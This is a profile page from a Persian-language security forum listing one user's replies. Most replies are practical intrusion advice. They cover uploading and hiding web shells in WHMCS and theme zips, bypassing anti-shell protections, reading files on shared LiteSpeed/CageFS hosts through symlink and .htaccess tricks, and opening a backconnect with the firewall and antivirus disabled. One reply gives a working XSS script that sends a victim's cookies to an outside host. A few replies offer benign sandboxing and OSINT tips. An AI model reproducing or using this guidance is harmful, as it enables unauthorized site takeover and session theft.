رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

Mr_Security

Member
  • تعداد ارسال ها

    65
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    1

آخرین بار برد Mr_Security در اسفند 14 2020

Mr_Security یکی از رکورد داران بیشترین تعداد پسند مطالب است !

اعتبار در سایت

10 Good

3 دنبال کننده

درباره Mr_Security

  • تاریخ تولد ۹۳/۰۲/۱۰

Converted

  • Name
    ReZa
  • Main os
    Ubuntu
  • Programming language
    خیر

آخرین بازدید کنندگان نمایه

بلوک آخرین بازدید کننده ها غیر فعال شده است و به دیگر کاربران نشان داده نمی شود.

  1. Mr_Security

    انجام تنظیمات سمت سرور

    نمیدونم چجوری دارید فایل اپلود میکنید طبق این فیلم جلو برید اپلود شل در whmcs اگر به نتیجه ای نرسیدید اعلام کنید
  2. Mr_Security

    انجام تنظیمات سمت سرور

    دوست عزیز باید موضوع شرح بدید اگر فایل اپلود می کنید اپلود میشه بعد پاک میشه ؟ .. خود انتی شلر سرور هست اگر پرمیشن اپلود فایل ندارید از پنل whmcs محدودیت ایجاد شده ... مورد اول از شلر های استفاده کنید که انتی شلر ها رو بایپس میکنه توی همین انجمن پر از این ابزار مورد دوم : 1 - میشه فایل php اپلود کرد اگر پرمشین نداشت php میتونید از منو تب قالب سایت شل را بصورت زیپ همراه با قالب سایت ایپورت کنید
  3. Mr_Security

    انجام تنظیمات سمت سرور

    سلام بله قبلا همچین مواردی برخورد کرده بودم قابل بایپس هستند باید نکات امنیتی رعایت کنید دلخوش به فایروال ها و .. و پلاگین های امنیتی نباشید تغییرات امنیتی بصورت دستی اعمال کنید
  4. سلام دوست عزیز باگ اول مربوط به xss میباشد حمله Cross-site scripting یا XSS یک نوع حمله تزریق کد می‌باشد که در سمت کاربر اتفاق می‌افتد و در آن حمله کننده می‌تواند کد و اسکریپت مخرب خود را در قالب یک فعالیت معمولی به وب‌سایت تزریق کند اول کار کشیدن کوکی ادمین است این دستور اجرا کنید و خروجی را اطلاع بدهید در تاپیک <script type=“text/javascript”>document.location=“http://target.com/?c=“+document.cookie;</script> ابزار های که بصورت اتوماتیک میشود بهترین بهرمندی رو ببرید XSSer , beef xss هست در مورد باگ دوم RCE خدمتتون عرض کنم احتمال 90% خطای اسکنر می باشد طبق تجربه 😁
  5. Mr_Security

    نحوه بایپس سیملینک در Litespeed - Cagefs

    سلام چندین موارد هست باید تست کنید البته فکر کنم اخرین ورژن کلودلینوکس خیلی از بایپس ها رو فیکس کرده درون فولدر که سیملینک زدید رو htaccess ادیت کنید و لاین اخر htaccess اینطوری وارد کنید readmename file.txt فایل که توی سرور شورکات کردید وارد نماید اگر این روش کار کند باید تو ایندکس اف برای شما اظلاعات فایل تکست نمایش داده خواهد شد -------- روش دوم بیشتر روی سرور لایت اسپید جواب میده : توی پوشه ی ایندکس اف این اپلود کنید,این فایل دقیقا میاد با استفاده از فانکشن file_get_contents برای شما فایل ها رو سرور فراخوانی میکنه فایل پیوست شد HEADER.zip
  6. Mr_Security

    ایجاد بک دور به سیستم بدون داشتن Ip Public

    سلام برای backconnect بدون ای پی ولید باید اول توی موردم port forwarding کنید و سپس مودم رو روی حالت bridge قرار دهید و وقتی تغییرات اعمال دادید فایروال ویندوز و انتی ویروس خود را ببندید و برید سراغ backconnect
  7. سلام و تشکر بابت اکسپلویت ها برای قشنگ تر و حرفه ای شدن کار بهتر اینجکت کامل تارگت درون اکسپلویت های که ثبت میکنید قرار دهید تشکر
  8. Mr_Security

    مشکل در اینجکت کردن تارگت

    سلام دوست عزیز فکر کنم سایت بسته شده و فعال نیست که تست کنم
  9. سلام دوتاشون از نظر امنیت ضعف های دارند LibreOffice در چندین هفته های اخیر چندین باگ با سطح دسترسی بالا داد در حال حاضر بهتر نکات امنیتی رعایت کنید و محدودسازی دسترسی و ایزوله نمودن برنامه استفاده کنید
  10. سلام بهترین ابزار که میتونم توی این حوزه بهتون معرفی کنم Maltego هست اطلاعات بصورت جامع در اختیارتون قرار میدهد قابلیت ها : People Groups of people (social networks) Companies Organizations Web sites Internet infrastructure such as: Domains DNS names Netblocks IP addresses Phrases Affiliations Documents and files These entities are linked using open source intelligence.
  11. سلام دوست عزیز برای اطلاع بیشتر از نوع این حملات این مقاله را مطالعه کنید
  12. سلام دوست عزیز در قسمتی که قصد دارید فایل اپلود کنید درون htaccess اون فولدر php رو فیلتر کرده و اجازه اپلود نمیده و منطقی هم هست و بایپس خاصی نداره در صورتی که شما بتوانید فایل htaccess خودتون اپلود کنید که مجوز اپلود php رو داشته باشه
  13. Mr_Security

    نفوذ به شبکه و راه مقابله ان

    سلام دوست عزیز بیشتر شرکن و کمپانی ها بزرگ شبکه هستند و شما اگه بخواهید وارد شبکه لوکال شوید حتما باید شل یا دسترسی به شکل ریموت داشته باشید و در غیر این صورت امکان پذیر نمی باشد مثال * برای نفوذ به شبکه راه های زیادی داره بصورت ریموت آسان ترین راه میشه گفته اسکن رنج آی پی شبکه مثال 192.168.1.1 تا .192.168.1.255 میتوانید از (متاسپلویت GUI) کمک بگیرید چو این ابزار علاوه بر اسکن رنج ای پی اکسپلویت و اسیب پذیر های روز رو بر روی شبکه تست میکند
  14. Mr_Security

    فایل Xls یا بد افزار

    سلام دوست عزیز برای تست این جور فایل ها و انالیز کردن بهتر است انهارو که هیچ گونه خطری هم برای شما نداشته باشد و یک آزمایشگاه امنیت برای خودتان ایجاد کنید توصیه و نظر شخصی من اینه که شما بروی سیتم خود vmware نصب کنید وروی vmware یک ویندوز بوت کنید و بهتراست که روی ویندوز جدید که روی vmware نصب کردید سندباکس استفاده کنید این فرضیه کاملا امنیت شمارو حفظ میکند و باحتی میتوانید فایل های مخرب هم باز کنید چون بصورت فیرز هست خطری برای شما ندارد در واقع میشه گفت بهترین ازمایشگاه تحلیل بدافزار تشکر
  15. سلام از این شل در فیلم استفاده شده لینک داخل شل روی cgi telnet run bypass کلیک کن

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...